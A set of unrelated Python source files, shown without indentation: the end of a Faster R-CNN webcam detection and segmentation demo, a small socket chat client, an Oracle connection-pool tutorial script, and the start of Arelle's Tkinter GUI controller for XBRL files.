# Get image from the webcam
if webcam_num >= 0:
if not cap.isOpened():
raise RuntimeError("Webcam could not open. Please check connection.")
ret, frame = cap.read()
im_in = np.array(frame)
# Load the demo image
else:
im_file = os.path.join(args.image_dir, imglist[num_images])
# im = cv2.imread(im_file)
im_in = np.array(imread(im_file))
if len(im_in.shape) == 2:
im_in = im_in[:, :, np.newaxis]
im_in = np.concatenate((im_in, im_in, im_in), axis=2)
# rgb -> bgr
im = im_in[:, :, ::-1]
# print(im.shape)
blobs, im_scales = _get_image_blob(im)
assert len(im_scales) == 1, "Only single-image batch implemented"
im_blob = blobs
im_info_np = np.array([[im_blob.shape[1], im_blob.shape[2], im_scales[0]]], dtype=np.float32)
im_data_pt = torch.from_numpy(im_blob)
im_data_pt = im_data_pt.permute(0, 3, 1, 2)
im_info_pt = torch.from_numpy(im_info_np)
im_data.data.resize_(im_data_pt.size()).copy_(im_data_pt)
im_info.data.resize_(im_info_pt.size()).copy_(im_info_pt)
gt_boxes.data.resize_(1, 1, 5).zero_()
num_boxes.data.resize_(1).zero_()
# dl_data.data.resize_(im_data_pt.size()).copy_(im_data_pt)
dl_data.data.resize_(im_data_pt.size()).zero_()
# pdb.set_trace()
# Mod: by Jie, add evaluation of segmentation
rois, cls_prob, bbox_pred, \
rpn_loss_cls, rpn_loss_box, \
RCNN_loss_cls, RCNN_loss_bbox, \
rois_label, drive_line, drive_line_loss = fasterRCNN(im_data, im_info, gt_boxes, num_boxes, dl_data)
def vis_drive_line(im, drive_line):
# print('drive_line.shape', drive_line.shape)
im2show = np.copy(im)
y_pred = drive_line.cpu().data.numpy()
_idx = 0
bs, c, h, w = drive_line.shape
y_pred_flag = np.argmax(y_pred[_idx,], axis=0) # one-hot: (C, H, W)--> label: (H, W)
hs, ws, cs = im.shape
y_pred_flag = y_pred_flag.astype(np.uint8) # This step is very important
y_pred_flag = imresize(y_pred_flag, (hs, ws), interp='nearest')
# find pred index
pred_idx = np.where(y_pred_flag == 1)
# 颜色顺序为BGR
mask_result = np.zeros((hs, ws, 3), dtype=np.uint8)
mask_result[pred_idx[0], pred_idx[1], :] = 0, 255, 0 # 漏报率,Red
# End mode
im2show = cv2.addWeighted(im2show, 1, mask_result, 0.4, 0)
result_path = os.path.join(args.image_dir, imglist[num_images][:-4] + "_seg.jpg")
cv2.imwrite(result_path, im2show)
def vis_bbox(im, rois, bbox_pred):
scores = cls_prob.data
boxes = rois.data[:, :, 1:5]
if cfg.TEST.BBOX_REG:
# Apply bounding-box regression deltas
box_deltas = bbox_pred.data
if cfg.TRAIN.BBOX_NORMALIZE_TARGETS_PRECOMPUTED:
# Optionally normalize targets by a precomputed mean and stdev
if args.class_agnostic:
if args.cuda > 0:
box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \
+ torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()
else:
box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS) \
+ torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS)
box_deltas = box_deltas.view(1, -1, 4)
else:
if args.cuda > 0:
box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \
+ torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()
else:
box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS) \
+ torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS)
box_deltas = box_deltas.view(1, -1, 4 * len(pascal_classes))
pred_boxes = bbox_transform_inv(boxes, box_deltas, 1)
pred_boxes = clip_boxes(pred_boxes, im_info.data, 1)
else:
# Simply repeat the boxes, once for each class
pred_boxes = np.tile(boxes, (1, scores.shape[1]))
pred_boxes /= im_scales[0]
scores = scores.squeeze()
pred_boxes = pred_boxes.squeeze()
det_toc = time.time()
detect_time = det_toc - det_tic
misc_tic = time.time()
if vis:
im2show = np.copy(im)
for j in xrange(1, len(pascal_classes)):
inds = torch.nonzero(scores[:, j] > thresh).view(-1)
# if there is det
if inds.numel() > 0:
cls_scores = scores[:, j][inds]
_, order = torch.sort(cls_scores, 0, True)
if args.class_agnostic:
cls_boxes = pred_boxes[inds, :]
else:
cls_boxes = pred_boxes[inds][:, j * 4:(j + 1) * 4]
cls_dets = torch.cat((cls_boxes, cls_scores.unsqueeze(1)), 1)
# cls_dets = torch.cat((cls_boxes, cls_scores), 1)
cls_dets = cls_dets[order]
keep = nms(cls_dets, cfg.TEST.NMS, force_cpu=not cfg.USE_GPU_NMS)
cls_dets = cls_dets[keep.view(-1).long()]
#add object of one class into the image
if vis:
data_path = args.data_path
im2show = vis_kiktech_detections(im2show, pascal_classes[j], cls_dets.cpu().numpy(),
data_path, im_file, 0.5)
result_path = os.path.join(args.image_dir, imglist[num_images][:-4] + "_det.jpg")
cv2.imwrite(result_path, im2show)
return
total_tic = time.time()
det_tic = time.time()
det_t = Thread(target=vis_bbox, args=(im, rois, bbox_pred))
det_t.start()
det_toc = time.time()
detect_time = det_toc - det_tic
seg_tic = time.time()
seg_t = Thread(target=vis_drive_line, args=(im, drive_line))
seg_t.start()
seg_toc = time.time()
seg_time = seg_toc - seg_tic
Thread.join(det_t)
Thread.join(seg_t)
total_toc = time.time()
total_time = total_toc - total_tic
if webcam_num == -1:
print('im_detect: {:d}/{:d} det_vis: {:.3f}s seg_vis: {:.3f}s total: {:.3f}s \r' \
.format(num_images + 1, len(imglist), detect_time, seg_time ,total_time))
if vis and (webcam_num == -1):
# result_path = os.path.join(args.image_dir, imglist[num_images][:-4] + "_det.jpg")
# cv2.imwrite(result_path, im2show_det)
#
# result_path = os.path.join(args.image_dir, imglist[num_images][:-4] + "_seg.jpg")
# cv2.imwrite(result_path, im2show_seg)
pass
else:
im2showRGB = cv2.cvtColor(im2show, cv2.COLOR_BGR2RGB)
cv2.imshow("frame", im2showRGB)
total_toc = time.time()
total_time = total_toc - total_tic
frame_rate = 1 / total_time
print('Frame rate:', frame_rate)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
all_time += total_time
print('total_time: {:.3f}s'.format(all_time))
if webcam_num >= 0:
cap.release()
cv2.destroyAllWindows()
|
client.py
|
from utils import sha256
import threading
import argparse
import socket
import json
class Client:
def __init__(self, ip: str, port: int, username: str, password: str):
self.__ip = ip
self.__port = port
self.alive = False
self.username = username
self.password = sha256(password)
@property
def ip(self) -> str:
return self.__ip
@property
def port(self) -> int:
return self.__port
def __enter__(self):
self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__socket.connect((self.ip, self.port))
return self.__socket
def __exit__(self, t, v, tb):
self.__socket.close()
self.__socket = None
def run(self):
with self as s:
s.settimeout(3)
try:
threading.Thread(target=self._track_other_messages, args=(s,), daemon=True).start()
while True:
message = input(f"({self.username})>_")
s.sendall(bytes(json.dumps({
"message": message,
"username": self.username,
"password": self.password
}), encoding="utf8"))
except KeyboardInterrupt:
pass
def _track_other_messages(self, conn):
while True:
try:
data = conn.recv(1024)
data = str(data, encoding="utf8")
data = json.loads(data)
name, message = data["name"], data["message"]
print(f"\r({name})>_{message}")
except KeyboardInterrupt:
break
except:
continue
def main():
parser = argparse.ArgumentParser(description="Client application.")
parser.add_argument("--username", "-u", type=str, help="Your username, visible to everyone.")
parser.add_argument("--password", "-p", type=str, help="Your password, visible as SHA256 hash to everyone.", default=None)
parser.add_argument("--ip", type=str, help="Server's IP address.", default="127.0.0.1")
parser.add_argument("--port", type=int, help="Server's port.", default=12288)
args = parser.parse_args()
client = Client(args.ip, args.port, args.username, args.password)
client.run()
if __name__ == "__main__":
main()
|
connect_pool.py
|
#------------------------------------------------------------------------------
# connect_pool.py (Section 2.1)
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Copyright 2017, 2018, Oracle and/or its affiliates. All rights reserved.
#------------------------------------------------------------------------------
from __future__ import print_function
import cx_Oracle
import threading
import db_config
pool = cx_Oracle.SessionPool(db_config.user, db_config.pw, db_config.dsn,
min = 2, max = 5, increment = 1, threaded = True)
def Query():
con = pool.acquire()
cur = con.cursor()
for i in range(4):
cur.execute("select myseq.nextval from dual")
seqval, = cur.fetchone()
print("Thread", threading.current_thread().name, "fetched sequence =", seqval)
thread1 = threading.Thread(name='#1', target=Query)
thread1.start()
thread2 = threading.Thread(name='#2', target=Query)
thread2.start()
thread1.join()
thread2.join()
print("All done!")
|
CntlrWinMain.py
|
'''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re
from tkinter import (Tk, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END, font as tkFont)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
PackageManager,
RenderingEvaluator,
TableStructure,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
restartMain = True
class CntlrWinMain (Cntlr.Cntlr):
def __init__(self, parent):
super(CntlrWinMain, self).__init__(hasGui=True)
self.parent = parent
self.filename = None
self.dirty = False
overrideLang = self.config.get("labelLangOverride")
self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
self.data = {}
if self.isMac: # mac Python fonts bigger than other apps (terminal, text edit, Word), and to windows Arelle
_defaultFont = tkFont.nametofont("TkDefaultFont") # label, status bar, treegrid
_defaultFont.configure(size=11)
_textFont = tkFont.nametofont("TkTextFont") # entry widget and combobox entry field
_textFont.configure(size=11)
#parent.option_add("*Font", _defaultFont) # would be needed if not using defaulted font
toolbarButtonPadding = 1
else:
toolbarButtonPadding = 4
tkinter.CallWrapper = TkinterCallWrapper
imgpath = self.imagesDir + os.sep
if self.isMSW:
icon = imgpath + "arelle.ico"
parent.iconbitmap(icon, default=icon)
#image = PhotoImage(file=path + "arelle32.gif")
#label = Label(None, image=image)
#parent.iconwindow(label)
else:
parent.iconbitmap("@" + imgpath + "arelle.xbm")
# try with gif file
#parent.iconbitmap(path + "arelle.gif")
self.menubar = Menu(self.parent)
self.parent["menu"] = self.menubar
self.fileMenu = Menu(self.menubar, tearoff=0)
self.fileMenuLength = 1
for label, command, shortcut_text, shortcut in (
#(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
(_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
(_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
(_("Import File..."), self.importFileOpen, None, None),
(_("Import Web..."), self.importWebOpen, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
(_("Save"), self.fileSaveExistingFile, "Ctrl+S", "<Control-s>"),
(_("Save As..."), self.fileSave, None, None),
(_("Save DTS Package"), self.saveDTSpackage, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
(_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
(None, None, None, None),
(_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
#(_("Restart"), self.restart, None, None),
(None, None, None, None),
("",None,None,None) # position for file history
):
if label is None:
self.fileMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, self.fileMenu)
self.fileMenuLength += 1
else:
self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
self.fileMenuLength += 1
self.loadFileMenuHistory()
self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)
toolsMenu = Menu(self.menubar, tearoff=0)
validateMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
self.validateCalcLB.trace("w", self.setValidateCalcLB)
validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",False)
self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
self.validateUtr.trace("w", self.setValidateUtr)
validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
pluginMenuExtender(self, validateMenu)
formulaMenu = Menu(self.menubar, tearoff=0)
formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
cacheMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})
toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
self.webCache.workOffline = self.config.setdefault("workOffline",False)
self.workOffline = BooleanVar(value=self.webCache.workOffline)
self.workOffline.trace("w", self.setWorkOffline)
cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
self.webCache.recheck = self.config.setdefault("webRecheck",False)
self.webRecheck = BooleanVar(value=self.webCache.webRecheck)
self.webRecheck.trace("w", self.setWebRecheck)
cacheMenu.add_checkbutton(label=_("Recheck file dates weekly"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.notify = self.config.setdefault("",False)
self.downloadNotify = BooleanVar(value=self.webCache.retrievalNotify)
self.downloadNotify.trace("w", self.setRetrievalNotify)
cacheMenu.add_checkbutton(label=_("Notify file downloads"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)
logmsgMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
self.collectProfileStats.trace("w", self.setCollectProfileStats)
logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
self.showDebugMessages = BooleanVar(value=self.config.setdefault("showDebugMessages",False))
self.showDebugMessages.trace("w", self.setShowDebugMessages)
logmsgMenu.add_checkbutton(label=_("Show debug messages"), underline=0, variable=self.showDebugMessages, onvalue=True, offvalue=False)
toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)
# view menu only if any plug-in additions provided
if any (pluginClassMethods("CntlrWinMain.Menu.View")):
viewMenu = Menu(self.menubar, tearoff=0)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.View"):
pluginMenuExtender(self, viewMenu)
self.menubar.add_cascade(label=_("View"), menu=viewMenu, underline=0)
helpMenu = Menu(self.menubar, tearoff=0)
for label, command, shortcut_text, shortcut in (
(_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
(_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
(_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
(None, None, None, None),
(_("About..."), self.helpAbout, None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
):
if label is None:
helpMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, helpMenu)
else:
helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)
windowFrame = Frame(self.parent)
self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
#self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
self.toolbar_images = []
toolbar = Frame(windowFrame)
menubarColumn = 0
self.validateTooltipText = StringVar()
for image, command, toolTip, statusMsg in (
#("images/toolbarNewFile.gif", self.fileNew),
("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
("toolbarSaveFile.gif", self.fileSaveExistingFile, _("Save file"), _("Saves currently selected local XBRL file")),
("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
(None,None,None,None),
("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
(None,None,None,None),
("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
(None,None,None,None),
("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
#(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
# ), self.logClear, _("Find options"), _("Select of find options")),
):
if command is None:
tbControl = Separator(toolbar, orient=VERTICAL)
tbControl.grid(row=0, column=menubarColumn, padx=6)
elif isinstance(image, Combobox):
tbControl = image
tbControl.grid(row=0, column=menubarColumn)
else:
image = os.path.join(self.imagesDir, image)
try:
image = PhotoImage(file=image)
self.toolbar_images.append(image)
tbControl = Button(toolbar, image=image, command=command, style="Toolbutton", padding=toolbarButtonPadding)
tbControl.grid(row=0, column=menubarColumn)
except TclError as err:
print(err)
if isinstance(toolTip,StringVar):
ToolTip(tbControl, textvariable=toolTip, wraplength=240)
else:
ToolTip(tbControl, text=toolTip)
menubarColumn += 1
for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
toolbarExtender(self, toolbar)
toolbar.grid(row=0, column=0, sticky=(N, W))
paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(paneWinLeftRt)
self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.add(self.tabWinTopLeft)
self.tabWinTopRt = Notebook(paneWinLeftRt)
self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinLeftRt.add(self.tabWinTopRt)
self.tabWinBtm = Notebook(paneWinTopBtm)
self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(self.tabWinBtm)
from arelle import ViewWinList
self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
if self.hasClipboard:
logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))
windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
windowFrame.columnconfigure(0, weight=999)
windowFrame.columnconfigure(1, weight=1)
windowFrame.rowconfigure(0, weight=1)
windowFrame.rowconfigure(1, weight=999)
windowFrame.rowconfigure(2, weight=1)
paneWinTopBtm.columnconfigure(0, weight=1)
paneWinTopBtm.rowconfigure(0, weight=1)
paneWinLeftRt.columnconfigure(0, weight=1)
paneWinLeftRt.rowconfigure(0, weight=1)
self.tabWinTopLeft.columnconfigure(0, weight=1)
self.tabWinTopLeft.rowconfigure(0, weight=1)
self.tabWinTopRt.columnconfigure(0, weight=1)
self.tabWinTopRt.rowconfigure(0, weight=1)
self.tabWinBtm.columnconfigure(0, weight=1)
self.tabWinBtm.rowconfigure(0, weight=1)
window = self.parent.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
priorState = self.config.get('windowState')
screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
if priorState == "zoomed":
self.parent.state("zoomed")
w = screenW
h = screenH
else:
priorGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)",self.config.get('windowGeometry'))
if priorGeometry and priorGeometry.lastindex >= 4:
try:
w = int(priorGeometry.group(1))
h = int(priorGeometry.group(2))
x = int(priorGeometry.group(3))
y = int(priorGeometry.group(4))
if x + w > screenW:
if w < screenW:
x = screenW - w
else:
x = 0
w = screenW
elif x < 0:
x = 0
if w > screenW:
w = screenW
if y + h > screenH:
if y < screenH:
y = screenH - h
else:
y = 0
h = screenH
elif y < 0:
y = 0
if h > screenH:
h = screenH
self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
except:
pass
# set top/btm divider
topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
if 10 < topLeftW < w - 60:
self.tabWinTopLeft.config(width=topLeftW)
if 10 < topLeftH < h - 60:
self.tabWinTopLeft.config(height=topLeftH)
self.parent.title(_("arelle - Unnamed"))
self.logFile = None
self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
self.uiThreadChecker(self.statusbar) # start background queue
self.modelManager.loadCustomTransforms() # load if custom transforms not loaded
if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
self.validateDisclosureSystem.set(False)
self.modelManager.validateDisclosureSystem = False
self.setValidateTooltipText()
def onTabChanged(self, event, *args):
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
break
except (AttributeError, TypeError, TclError):
pass
def loadFileMenuHistory(self):
self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 2)
fileHistory = self.config.setdefault("fileHistory", [])
self.recentFilesMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(fileHistory), 10 ) ):
self.recentFilesMenu.add_command(
label=fileHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
importHistory = self.config.setdefault("importHistory", [])
self.recentAttachMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(importHistory), 10 ) ):
self.recentAttachMenu.add_command(
label=importHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
self.packagesMenu = Menu(self.menubar, tearoff=0)
hasPackages = False
for i, packageInfo in enumerate(sorted(PackageManager.packagesConfig.get("packages", []),
key=lambda packageInfo: packageInfo.get("name")),
start=1):
name = packageInfo.get("name", "package{}".format(i))
URL = packageInfo.get("URL")
if name and URL and packageInfo.get("status") == "enabled":
self.packagesMenu.add_command(
label=name,
command=lambda url=URL: self.fileOpenFile(url))
hasPackages = True
if hasPackages:
self.fileMenu.add_cascade(label=_("Packages"), menu=self.packagesMenu, underline=0)
def onPackageEnablementChanged(self):
self.loadFileMenuHistory()
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.parent.title(_("arelle - Unnamed"));
self.modelManager.load(None);
def getViewAndModelXbrl(self):
view = getattr(self, "currentView", None)
if view:
modelXbrl = None
try:
modelXbrl = view.modelXbrl
return (view, modelXbrl)
except AttributeError:
return (view, None)
return (None, None)
def okayToContinue(self):
view, modelXbrl = self.getViewAndModelXbrl()
documentIsModified = False
if view is not None:
try:
# What follows only exists in ViewWinRenderedGrid
view.updateInstanceFromFactPrototypes()
except AttributeError:
pass
if modelXbrl is not None:
documentIsModified = modelXbrl.isModified()
if not self.dirty and (not documentIsModified):
return True
reply = tkinter.messagebox.askokcancel(
_("arelle - Unsaved Changes"),
_("Are you sure to close the current instance without saving?\n (OK will discard changes.)"),
parent=self.parent)
if reply is None:
return False
else:
return reply
def fileSave(self, event=None, view=None, fileType=None, filenameFromInstance=False, *ignore):
if view is None:
view = getattr(self, "currentView", None)
if view is not None:
filename = None
modelXbrl = None
try:
modelXbrl = view.modelXbrl
except AttributeError:
pass
if filenameFromInstance:
try:
modelXbrl = view.modelXbrl
filename = modelXbrl.modelDocument.filepath
if filename.endswith('.xsd'): # DTS entry point, no instance saved yet!
filename = None
except AttributeError:
pass
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
if fileType in ("html", "xml", None):
if fileType == "html" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
defaultextension=".html")
elif fileType == "xml" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save Table Layout Model"),
initialdir=initialdir,
filetypes=[(_("Layout model file .xml"), "*.xml")],
defaultextension=".xml")
else: # ask file type
if filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
defaultextension=".html")
if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
view.saveInstance(filename)
return True
if not filename:
return False
try:
ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif fileType == "xbrl":
return self.uiFileDialog("save",
title=_("arelle - Save Instance"),
initialdir=initialdir,
